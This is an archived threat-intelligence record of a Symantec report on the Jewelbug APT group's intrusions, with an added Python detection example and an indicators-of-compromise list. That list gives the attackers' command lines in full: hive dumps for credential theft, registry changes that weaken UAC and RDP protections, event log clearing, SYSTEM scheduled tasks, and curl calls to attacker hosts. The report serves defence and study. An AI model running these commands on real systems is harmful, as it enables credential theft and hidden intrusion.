{
	"id": "8d5fbceb-0781-41df-8b42-5065909c34f3",
	"created_at": "2026-04-06T00:20:55.84368Z",
	"updated_at": "2026-04-10T13:11:54.032802Z",
	"deleted_at": null,
	"sha1_hash": "85a987395f71a3b1cf9cc204cc9d7fd88712a335",
	"title": "Jewelbug: Chinese APT Group Widens Reach to Russia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 72432,
	"plain_text": "Jewelbug: Chinese APT Group Widens Reach to Russia\r\nArchived: 2026-04-05 17:30:06 UTC\r\nChinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has been highly active in recent months,\r\ntargeting organizations in South America, South Asia, Taiwan and Russia. One of its intrusions was on the\r\nnetwork of a Russian IT service provider and lasted for the first five months of 2025. \r\nThe attackers had access to code repositories and software build systems that they could potentially leverage to carry\r\nout supply chain attacks targeting the company’s customers in Russia. Notably, the attackers were exfiltrating\r\ndata to Yandex Cloud. Yandex is a popular service in Russia, so the attackers likely chose to use it in order to\r\navoid raising suspicions. \r\nIn other activity on a large South American government organization in July 2025, Jewelbug deployed a new\r\nbackdoor that appears to be under development by the group.\r\nJewelbug also compromised the network of a Taiwanese company, as well as another IT provider based in South\r\nAsia in recent months. However, its targeting of a Russian company is of particular note as Chinese and Russian\r\nthreat actors have, until recently, rarely been seen to be attacking each other. Jewelbug’s attack is the continuation\r\nof a trend that seems to have begun following Russia’s invasion of Ukraine. \r\nAttack on Russian IT service provider\r\nThe first suspicious activity that occurred on this network was the appearance of a file named 7zup.exe (Command\r\nline: CSIDL_PROFILE\\public\\downloads\\7zup.exe -d -remote up), which is a renamed copy of cdb.exe, a benign\r\nMicrosoft-signed binary. CDB is the Microsoft Console Debugger. Use of a renamed version of cdb.exe is a\r\nhallmark of Jewelbug activity. CDB can be used to run shellcode and bypass application whitelisting. 
It can also\r\nbe used to launch executables, run DLLs and terminate security solutions, making it a powerful tool. Microsoft\r\nrecommends that CDB should be blocked from running by default and whitelisted for specific users only when it’s\r\nexplicitly needed. \r\nOther activity on this network included credential dumping, and persistence and elevation of privileges via\r\nscheduled tasks (schtasks). The attackers also attempted to cover up their activity by clearing Windows Event\r\nLogs. \r\nThe use of Yandex Cloud to exfiltrate data was also a probable attempt by the attackers to remain under the radar\r\nas Yandex is a legitimate and commonly used cloud service in Russia. For this reason, it is unlikely to be blocked\r\nby Russian enterprises, and its use is less likely to raise suspicions. To exfiltrate the victims’ data the attackers\r\nused a malicious sample that they had named “yandex2.exe.” \r\nAs mentioned previously, the attackers were also targeting machines with build systems and code repository\r\nsystems, potentially seeking to leverage access to the source code to carry out a supply chain attack targeting the\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 1 of 7\n\ncompany’s customers in Russia. IT service providers are popular targets for attackers seeking to carry out supply\r\nchain attacks as they often have extensive access to their customers’ systems and may be able to automatically\r\ndeploy updates or software across a large number of networks simultaneously, potentially giving the attackers\r\naccess to, or allowing them to infect, a huge number of organizations at the same time. 
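Hunting for the tradecraft described in this section in process-creation telemetry, as an added example that is not code from the original Symantec report. The rules below run over constructed Sysmon Event ID 1-style records (not telemetry from the report) whose command lines follow the ones listed in the IOC section. They flag the renamed cdb.exe copy by comparing the file name on disk with the PE OriginalFileName, registry hive saves, event log clearing, SYSTEM-level scheduled tasks, the LocalAccountTokenFilterPolicy change and the DisableRestrictedAdmin change. The record field names (image, original_file_name, command_line) are assumptions for this example, not Sysmon's own field names.

```python
import re

BS = chr(92)  # one backslash, the Windows path separator


def win(*parts):
    # Join path components with backslashes.
    return BS.join(parts)


def norm(cmd):
    # Lower-case, collapse whitespace and unify separators so the rules can
    # use plain substrings and short regexes.
    return ' '.join(cmd.lower().replace(BS, '/').split())


def basename(path):
    # File name component of a Windows path, lower-cased.
    return path.replace(BS, '/').rsplit('/', 1)[-1].lower()


# Constructed process-creation records (not telemetry from the report). Field
# names are assumptions; original_file_name stands for the value Sysmon reads
# from the PE version resource, which renaming the file on disk does not
# change, so 7zup.exe still reports itself as CDB.Exe.
SAMPLE_EVENTS = [
    {'image': win('C:', 'Users', 'Public', 'Downloads', '7zup.exe'),
     'original_file_name': 'CDB.Exe', 'command_line': '7zup.exe -d -remote up'},
    {'image': win('C:', 'Windows', 'System32', 'reg.exe'), 'original_file_name': 'reg.exe',
     'command_line': 'reg save ' + win('HKLM', 'SAM') + ' '
                     + win('C:', 'Users', 'Public', 'Pictures', 'sam.hive')},
    {'image': win('C:', 'Windows', 'System32', 'schtasks.exe'), 'original_file_name': 'schtasks.exe',
     'command_line': 'schtasks /create /RL HIGHEST /F /tn '
                     + win('Microsoft', 'Windows', 'ApplicationData', 'appuriverifierinstalls')
                     + ' /tr ' + win('C:', 'Windows', 'System32', 'oobe', 'setup.exe')
                     + ' /sc onstart /RU SYSTEM'},
    {'image': win('C:', 'Windows', 'System32', 'wevtutil.exe'), 'original_file_name': 'wevtutil.exe',
     'command_line': 'wevtutil cl Security /q:true'},
    {'image': win('C:', 'Windows', 'System32', 'reg.exe'), 'original_file_name': 'reg.exe',
     'command_line': 'reg add ' + win('hklm', 'SOFTWARE', 'Microsoft', 'Windows', 'CurrentVersion', 'Policies', 'System')
                     + ' /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /F'},
    {'image': win('C:', 'Windows', 'System32', 'reg.exe'), 'original_file_name': 'reg.exe',
     'command_line': 'REG ADD ' + win('HKLM', 'System', 'CurrentControlSet', 'Control', 'Lsa')
                     + ' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f'},
    {'image': win('C:', 'Windows', 'System32', 'bitsadmin.exe'), 'original_file_name': 'bitsadmin.exe',
     'command_line': 'bitsadmin /transfer myJob /download /priority normal '
                     'https://www.microsoft.com/pt-br/ ' + win('C:', 'recovery', 'index.html')},
    # Benign noise: an admin listing processes, and the real debugger run from
    # its install location under its own name (must not fire).
    {'image': win('C:', 'Windows', 'System32', 'cmd.exe'), 'original_file_name': 'Cmd.Exe',
     'command_line': 'cmd.exe /c tasklist'},
    {'image': win('C:', 'Program Files (x86)', 'Windows Kits', '10', 'Debuggers', 'x64', 'cdb.exe'),
     'original_file_name': 'CDB.Exe', 'command_line': 'cdb.exe -z crash.dmp'},
]

# Each rule receives the raw record and the normalised command line.
RULES = [
    # Renamed console debugger: PE name says cdb.exe, file name on disk does not.
    ('renamed_cdb', lambda ev, n: ev['original_file_name'].lower() == 'cdb.exe'
     and basename(ev['image']) != 'cdb.exe'),
    # Offline credential dumping: SAM, SECURITY or SYSTEM hive saved to disk.
    ('hive_dump', lambda ev, n: re.search('reg save hklm/(sam|security|system)', n) is not None),
    # Anti-forensics: an event log cleared.
    ('eventlog_clear', lambda ev, n: re.search('wevtutil (cl|clear-log) ', n) is not None),
    # Persistence and elevation: a task created to run as SYSTEM.
    ('system_scheduled_task', lambda ev, n: 'schtasks' in n and '/create' in n and '/ru system' in n),
    # Remote UAC token filtering disabled, so local admin credentials work remotely.
    ('remote_uac_bypass', lambda ev, n: 'localaccounttokenfilterpolicy' in n
     and re.search('/d 0*1( |$)', n) is not None),
    # DisableRestrictedAdmin set to 0 enables Restricted Admin RDP, which accepts a hash.
    ('restricted_admin_enabled', lambda ev, n: 'disablerestrictedadmin' in n
     and re.search('/d 0+( |$)', n) is not None),
    # BITS used as a downloader.
    ('bits_download', lambda ev, n: 'bitsadmin /transfer' in n and '/download' in n),
]


def triage(events):
    # Return (rule name, image basename) for every rule each record trips.
    hits = []
    for ev in events:
        n = norm(ev['command_line'])
        for name, pred in RULES:
            if pred(ev, n):
                hits.append((name, basename(ev['image'])))
    return hits


if __name__ == '__main__':
    for rule, proc in triage(SAMPLE_EVENTS):
        print(rule, proc)
```

Running the block prints one hit per hostile record and nothing for the two benign ones. The renamed-binary rule depends on a source that records the PE OriginalFileName (Sysmon Event ID 1 or an EDR equivalent); a copy whose version resource has been stripped or patched would need a hash or signer check instead, and the substring rules are deliberately loose, so expect to tune them against your own baseline before alerting on them.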
\r\nIt appears attackers may have been on this network for some time, with the first indication of suspicious activity\r\ndating from January 2025, while the most recent suspicious activity on this network occurred in May 2025.\r\nNew backdoor deployed in South American victim\r\nJewelbug also compromised a network belonging to a South American government department. It appears\r\nJewelbug has been on the network of the department multiple times, or else has maintained persistence on the\r\nnetwork for a long time, because suspicious activity was first seen in this organization in September 2024, with\r\nthe most recent activity seen in July 2025. \r\nIn the September 2024 activity, the attackers attempted to add a new user to the network, as well as attempting to\r\ndeploy a remote access tool to gain access to machines. They also used the legitimate AnyDesk remote\r\nmanagement software, and deployed the 7-zip archive manager, which is often used to pack files before they are\r\nexfiltrated from victim machines. In the more recent activity in July 2025, the attackers used a legitimate\r\nexecutable for DLL sideloading, and the SMBExec tool for likely lateral movement on the network. They also\r\nused scheduled tasks for persistence, and BITSAdmin and the curl tool, probably to exfiltrate data.\r\nAlso in this organization, Jewelbug deployed what appears to be a new backdoor in development by the\r\ngroup. This malware leverages Microsoft Graph API and OneDrive as its command and control (C\u0026C) servers.\r\nThe malware deployed on the victim network appears to have some issues and limitations, perhaps pointing to it\r\nbeing a work in progress, or some inexperience on the part of the developer. However, activity we do see being\r\ncarried out by this malware includes:\r\nObtains a list of files from targeted machines and uploads this to OneDrive\r\nDoes some logging into C:\\ProgramData\\application.ini. 
Some examples of this logging include:\r\ninit successfully!\r\nFreeFileInformation Fuc successfully!\r\nC:\\Users\\Public\\Libraries~\r\nCreateDirectory       Successfully!\r\nGet Token successfully!\r\nCreate Folder In OneDrive successfully!\r\nHttpSendRequestWPtr Error Code:0\r\nCreates the directory C:\\Users\\Public\\Libraries~ and hides it on the victim machine\r\nThe malware also obtains the infected machine’s IP, Windows version, and hostname. In some cases, it also\r\ncollects the machine identifier. It uploads this information to OneDrive.\r\nThe logging done by this malware is of note as it points to this malware possibly being “tested” by the attackers. It\r\nis also notable as it shows that Jewelbug is continuing to develop new malware. The use of the Microsoft Graph API\r\nand OneDrive for C\u0026C by Jewelbug is also interesting as it minimizes malicious indicators that would be\r\nobservable to traditional security software, making this activity much harder to detect. Blocking the destination is\r\nrarely an option, so detection has to rely on host-side context, such as which process is making the Graph requests.\r\nBYOVD technique used to target Taiwanese software company\r\nJewelbug was also on the network of a Taiwanese software company in October and November 2024. Unlike the\r\nlater activity targeting the Russian IT service provider, however, there was no evidence of a software supply chain\r\nattack motivation. The attackers used DLL sideloading to load malware payloads. DLL sideloading is a very\r\npopular tactic among Chinese threat groups. ShadowPad was also deployed on this network. ShadowPad is a\r\npowerful modular backdoor that is exclusively used by Chinese threat actors. The attackers also used the KillAV\r\ntool to disable security software, as well as deploying a publicly available tool called EchoDrv, which permits\r\nabuse of the kernel read/write vulnerability in the ECHOAC anti-cheat driver. 
This is likely an example of the\r\nattackers using the bring-your-own-vulnerable-driver (BYOVD) technique as an attempt to avoid their malicious\r\nactivity being detected. They also created scheduled tasks for persistence.\r\nThe attackers dumped credentials from LSASS memory, including with Mimikatz, and deployed Fast Reverse Proxy (FRP), which can expose\r\nlocal servers to the public internet. They also deployed several publicly available tools for discovery and\r\nprivilege escalation: PrintNotifyPotato, CoercedPotato, and SweetPotato, all of which are freely available on\r\nGitHub. The attackers also used a publicly available tunnelling tool called EarthWorm in a likely attempt to mask\r\ncommands or data being sent to and from the victim network. The attackers were on this network for\r\napproximately three weeks, indicating some skill at remaining under the radar.\r\nOn the networks of both the Taiwanese software company and the South American government agency, a renamed\r\nversion of the Microsoft Console Debugger (cdb.exe) tool was used. Jewelbug’s use of this tool is notable as it is a\r\nrelatively little-known tool, despite it having numerous uses that could be beneficial to malicious actors, as\r\ndiscussed above. In one instance we also saw the CDB tool being used to inject into mspaint.exe. Mspaint has\r\npreviously been documented as being used by Jewelbug to inject malware.\r\nJewelbug’s preference for using cloud services and other legitimate tools in its operations indicates that remaining\r\nunder the radar and establishing a stealthy and persistent presence on victim networks is of utmost importance to\r\nthis group.\r\nPrevious Jewelbug activity\r\nJewelbug is believed to have been active since mid-2023, which was when binaries associated with it were first\r\nuploaded to VirusTotal. 
As well as the attacks mentioned in this blog, Jewelbug has also been associated with\r\nattacks targeting organizations in Southeast Asia, including a university, a telecoms organization and a government\r\nministry. Up to this point the group had been associated only with attacks on organizations in Asia and South\r\nAmerica; there has been no previous documentation of the group targeting organizations in Russia. A blog\r\nreleased by security company Elastic earlier this year did say it had seen Jewelbug attackers using a domain that\r\nmimicked a Russian organization, but they did not identify any victims in Russia as part of that activity.\r\nThat blog also detailed Jewelbug’s use of unique malware called Finaldraft, Pathloader and Guidloader. Finaldraft\r\nis a full-featured remote administration tool with the ability to accept add-on modules that extend functionality. It\r\nalso:\r\nHas support for proxying network traffic.\r\nUses the Microsoft Graph API, a third-party cloud service, for C\u0026C.\r\nExists in both Windows and Linux versions.\r\nPathloader and Guidloader are malware used to download and execute encrypted shellcode in memory. They have\r\nonly been observed in association with Finaldraft.\r\nPalo Alto also published a report about the custom malware used by Jewelbug, though it dubbed the Finaldraft\r\nbackdoor Squidoor. It also noted that Jewelbug gained access to networks of interest by exploiting various\r\nvulnerabilities in Internet Information Services (IIS) servers before deploying webshells on infected servers. 
It\r\nalso said that, in addition to using the Microsoft Graph API for C\u0026C communication, the attackers used DNS and\r\nICMP tunnelling.\r\nPrevious reporting about Jewelbug has also noted the use of the CDB tool, the use of mspaint.exe to inject\r\ncommands, and the wide-ranging use of dual-use and living-off-the-land tools by the attackers, all of which\r\nwas also seen in the recent activity observed by the Threat Hunter Team.\r\nAll indications point to Jewelbug being of Chinese origin, with its motivation most likely to be espionage and\r\nmaintaining a long-term and stealthy presence on compromised networks. \r\nChinese threat actors looking in a new direction?\r\nThe most notable element of all this recent Jewelbug activity is the targeting of a Russian IT service provider by\r\nthe Chinese APT group. When it comes to things like the Russia-Ukraine conflict and other geopolitical matters,\r\nChina has traditionally backed, or at least not opposed, Russia, with the two considered to be loosely allied. The\r\ntargeting of a Russian organization by a Chinese APT group shows, however, that Russia is not out-of-bounds\r\nwhen it comes to operations by China-based actors. The fact that there are indications the IT service provider may\r\nhave been targeted for the purposes of a software supply chain attack on the company’s customers in Russia is\r\nalso notable as it means this attack had the potential to give the attackers access to a large number of companies in\r\nthe country, which they could have used for cyber espionage or disruption. \r\nJewelbug’s use of a new backdoor-in-development in this set of activity is also important as it shows that the\r\ngroup is continuing to actively develop its toolset and capabilities. Jewelbug, as a relatively new Chinese APT\r\ngroup, is one to watch as it has the skills to develop its own malware and maintain a long-term and stealthy\r\npresence on networks. 
\r\nIndicators of compromise (IOCs)\r\nFile indicators\r\n267ae4d7767d9980b3fbbfd5063bd28d5e05d22d64615fe7532d55a6063dfeb3 - cyglaunch.exe - Benign\r\nexecutable used for DLL sideloading\r\ncffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9 - cdb.exe - Benign\r\nexecutable, Debugging Tools for Windows\r\n010f76b21251eb5d8bc77bcfdb47d5f13009aa985e744b843fc2e35b23fb2a44 - vmwarebase.dll\r\n015e424dc798bc4ef39f5237062d2402f5207fbf912a22ce6fb46ef9e42fd6ca - libgimpbase-2.0-0.dll\r\n0642ada1f7c8b3cc43a1d69d6aa86fc1970e257271811e637b0e4349aa880fa8 - getkey.exe\r\n078a3a2c4f24d8811bb1aa673790c16ad5ea563127af1a5d4a41c893b215c372 - crclient.dll\r\n15eaa601b1bfb8cd7cd5513c692eea4ed4302f6fcbee4722433e0c85388de35d - vmwarebase.dll\r\n259f65bcdd367e6d84a4cba75375744e85fbe58293c88b1ad5a1bee4add63b9d - cygwin1.dll\r\n37e83ffde09a83273a4cea7fe24d3fda63fb342e6a3512de4541d62ab43aadd0 - jli.dll\r\n3f49bd1f3b0999096511757e0fbc2e4e2c18176fd1773f71baf2d7a15dbbcfbf - yandex2.exe\r\n5525c51063d40e12029d9ef4b646e261c853c655b9b2acc74a411428e873a8a1 - crclient.dll\r\n5c396da8b64faf6e29ee38cdf0a4b9a652e01236d2b981c2ca806aa14d94c956 - sccmvnc.exe\r\n5c3f0420c00e6ca123790403b6ed1f53f493357dfdd54ed9460d615d57f6bcd4 - vmwarebase.dll\r\n67bb887a0f34543a32b845029be308f436704207a1964a2a3582f42fe6de4176 - atackersexe.zip\r\n6d4d9b68d02e93e721943a6943cda6544bf4d31d109415774565b544b512ed25 - yandex2.exe\r\n872045fe5bea78e4daac4f0352028060b0fadccfbf0a40b57d405579821850bb - crclient.dll\r\n87ead55ff94b6cd9d80f590793d0dc17d9f5d442b6c827dcfb8db0c078918bd1 - xinput1_3.dll\r\n9f4b046e9f9dbc36b8df011a69490948dce5b9645fc5209b0b3a60dad5a493e6 - crclient.dll\r\na1e45ec8639f55290a5eb47e9f75e6413b12eaa6f9e3834af600e00fe529a637 - vmwarebase.dll\r\nb49e142b89c47757a0afb786bf0e6c11c9548f626c4127d4d16d30e3004bdfb1 - python311.dll\r\nba0dbee9538073fd81953a37218f200988ad91a8380e68118ea83e146e1d986d - 
python311.dll\r\nbc270539c6a057791fba4793dc7e2d2567070e50ea089cc6fa032b3285576c64 - getkey.exe\r\nbfe1538445e3f74ef7f41699482b40cf6f3b0a084e188f4c4b786b15eeb3601c - mimikatz.x64.exe - Mimikatz\r\ncc87dee890641bd015a04e46a881eb844c774519d55b986fb216c4c2141479e8 - t.exe\r\nd5147787d52636a3c6c2a0c84b351633ad7f45ce4ae5c2007e568f715fec3e49 - g.exe\r\nNetwork indicators\r\napp.blance.workers[.]dev\r\ncdn.kindylib[.]info\r\n95.164.5[.]209\r\nCommand lines\r\n7zup.exe -d -remote up\r\nSysteminfo\r\nquser\r\nnetstat -ano\r\ntasklist\r\ncleanmgr\r\ncscript //nologo \"CSIDL_SYSTEM\\winrm.vbs\" get winrm/config\r\ncurl https://app.blance.workers.dev/png\r\ncurl -k https://95.164.5.209/png\r\ncurl https://app.blance.workers.dev/apii\r\nbitsadmin /transfer myJob /download /priority normal https://www.microsoft.com/pt-br/\r\nCSIDL_SYSTEM_DRIVE\\recovery\\index.html\r\ncurl -k https://34.117.217.74/ -o curl.txt\r\nreg save HKLM\\SAM CSIDL_COMMON_PICTURES\\sam.hive\r\nreg save HKLM\\SECURITY CSIDL_COMMON_PICTURES\\security.hive\r\nreg save HKLM\\SYSTEM CSIDL_COMMON_PICTURES\\system.hive\r\nreg add hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v\r\nLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /F\r\nschtasks /create /RL HIGHEST /F /tn \"Microsoft\\Windows\\ApplicationData\\appuriverifierinstalls\" /tr\r\n\"CSIDL_SYSTEM\\oobe\\setup.exe \\ui\" /sc onstart /RU SYSTEM\r\nschtasks /run /tn \"Microsoft\\Windows\\ApplicationData\\appuriverifierinstalls\"\r\nSCCMVNC.exe reconfig /target:10.1.0.110\r\nnet use \\\\[REDACTED]\\ipc$ \u003c?,?\u003e /user:[REDACTED]\r\nwevtutil cl \"Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity\" /q:true\r\npowershell -Command \"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 
21} | ForEach-Object { $eventXml =\r\n[xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress =\r\n$eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -\r\nand $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login \u003c?,?\u003e ' + $loginTime) }}\"\r\nREG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" /v DisableRestrictedAdmin /t REG_DWORD /d\r\n00000000 /f\r\ncmd.exe /Q /c taskkill /pid 37984 /f 1\u003e \\\\127.0.0.1\\ADMIN$\\__1751968474.3717754 2\u003e\u00261\r\ncmd.exe /Q /c vmware-authd.exe run 1\u003e \\\\127.0.0.1\\ADMIN$\\__1751968461.873731 2\u003e\u00261\r\nCSIDL_SYSTEM\\cmd.exe /Q /c echo cd ^\u003e \\\\\u003c11,921B07E0\u003e\\C$\\__output 2^\u003e^\u00261 \u003e\r\nCSIDL_WINDOWS\\oyykocjz.bat \u0026 CSIDL_SYSTEM\\cmd.exe /Q /c CSIDL_WINDOWS\\oyykocjz.bat \u0026 del\r\nCSIDL_WINDOWS\\oyykocjz.bat\r\ncmd.exe /Q /c del CSIDL_SYSTEM_DRIVE\\\"program files\"\\videolan\\vlc\\crashpad.exe 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1751952183.5376222 2\u003e\u00261\r\ncmd.exe /Q /c schtasks /create /tn \"GetEvent\" /tr \"\\\"CSIDL_PROGRAM_FILES\\aker\\aker client\\vmware-authd.exe\" run\" /sc once /st 02:30 /ru SYSTEM /F 1\u003e \\\\127.0.0.1\\ADMIN$\\__1752037991.49069 2\u003e\u00261\r\nSource: https://www.security.com/threat-intelligence/jewelbug-apt-russia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.security.com/threat-intelligence/jewelbug-apt-russia"
	],
	"report_names": [
		"jewelbug-apt-russia"
	],
	"threat_actors": [
		{
			"id": "2f964894-0020-457e-b4e7-65a8c8fe740c",
			"created_at": "2025-05-29T02:00:03.202897Z",
			"updated_at": "2026-04-10T02:00:03.858601Z",
			"deleted_at": null,
			"main_name": "Earth Alux",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Alux",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fdcb30ba-5fef-4ae2-97bd-f8200f4bd2e5",
			"created_at": "2025-04-22T02:01:52.35523Z",
			"updated_at": "2026-04-10T02:00:04.658231Z",
			"deleted_at": null,
			"main_name": "Earth Alux",
			"aliases": [],
			"source_name": "ETDA:Earth Alux",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Godzilla",
				"Godzilla Loader",
				"MASQLOADER",
				"RAILLOAD",
				"RAILSETTER",
				"RSBINJECT",
				"VARGEIT",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "68a86dfa-1a6d-4254-bd39-a9aa1129fdf5",
			"created_at": "2025-05-29T02:00:03.198435Z",
			"updated_at": "2026-04-10T02:00:03.855309Z",
			"deleted_at": null,
			"main_name": "REF7707",
			"aliases": [
				"CL-STA-0049",
				"Jewelbug"
			],
			"source_name": "MISPGALAXY:REF7707",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434855,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.pdf",
		"text": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.txt",
		"img": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.jpg"
	}
}